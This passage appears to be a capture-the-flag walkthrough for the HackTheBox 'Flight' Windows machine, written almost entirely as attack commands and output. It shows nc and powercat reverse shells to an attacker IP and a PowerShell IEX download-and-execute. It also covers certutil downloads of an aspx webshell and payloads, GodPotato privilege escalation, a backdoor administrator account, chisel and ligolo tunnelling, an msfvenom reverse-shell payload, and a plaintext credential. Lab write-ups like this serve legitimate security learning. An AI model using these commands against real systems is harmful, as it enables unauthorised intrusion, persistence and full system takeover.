.\ligo-windows-agent.exe -connect 10.10.14.6:11601 -ignore-cert
```

```sh
C:\Users\C.Bum>.\ligo-windows-agent.exe -connect 10.10.14.6:11601 -ignore-cert
```

```sh
ligolo-ng » session
? Specify a session : 1 - #1 - flight\C.Bum@g0 - 10.10.11.187:53204
[Agent : flight\C.Bum@g0] » start
[Agent : flight\C.Bum@g0] » INFO[0280] Starting tunnel to flight\C.Bum@g0
```

```sh
ip route add 240.0.0.1/32 dev ligolo
```

```sh
Invoke-RunasCs c.bum Tikkycoll_431012284 -ProcessTimeout 0 -Command "C:\Users\Public\nc.exe 10.10.14.6 1236 -e cmd"
```
- can write to this site

```sh
C:\inetpub\development>echo 'test'>test.txt
echo 'test'>test.txt
```

- since it is under inetpub, an aspx/asp webshell might work

```sh
C:\inetpub\development>certutil.exe -f -urlcache -split http://10.10.14.6/cmdasp.aspx cmdasp.aspx
```

## rev shell as iis
```sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1');powercat -c 10.10.14.6 -p 1237 -e cmd
```

```sh
nc -lvnp 1237
listening on [any] 1237 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 53317
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
```

```sh
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

## SeImpersonatePrivilege
```sh
certutil.exe -f -urlcache -split http://10.10.14.6/GodPotato-NET4.exe GodPotato-NET4.exe
```

```cmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.6 1238"
```

```cmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 127.0.0.1 1238"
```

```sh
GodPotato-NET4.exe -cmd "cmd /c whoami"
```

```sh
GodPotato-NET4.exe -cmd "cmd /c net user test Password123 /add && net localgroup administrators test /add"
```

```sh
nxc smb 10.10.11.187 -u test -p 'Password123'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\test:Password123 (Pwn3d!)
```

## root.txt
```sh
C:\Users\Administrator\Desktop> type root.txt
38ff618c...
```

```sh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/chisel.exe chisel.exe
```

```sh
./chisel server --reverse --port 1234
2025/01/22 21:43:11 server: Reverse tunnelling enabled
2025/01/22 21:43:11 server: Fingerprint bjoUnkeFlkTVNUpqSkmx+skkpmWB3VRdMdxLC3dPTyI=
2025/01/22 21:43:11 server: Listening on http://0.0.0.0:1234
```

```cmd
.\chisel.exe client 10.10.14.6:1234 R:8000:127.0.0.1:8000
```

```cmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.6 80"
```

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exe
```

```sh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/reverse.exe reverse.exe
```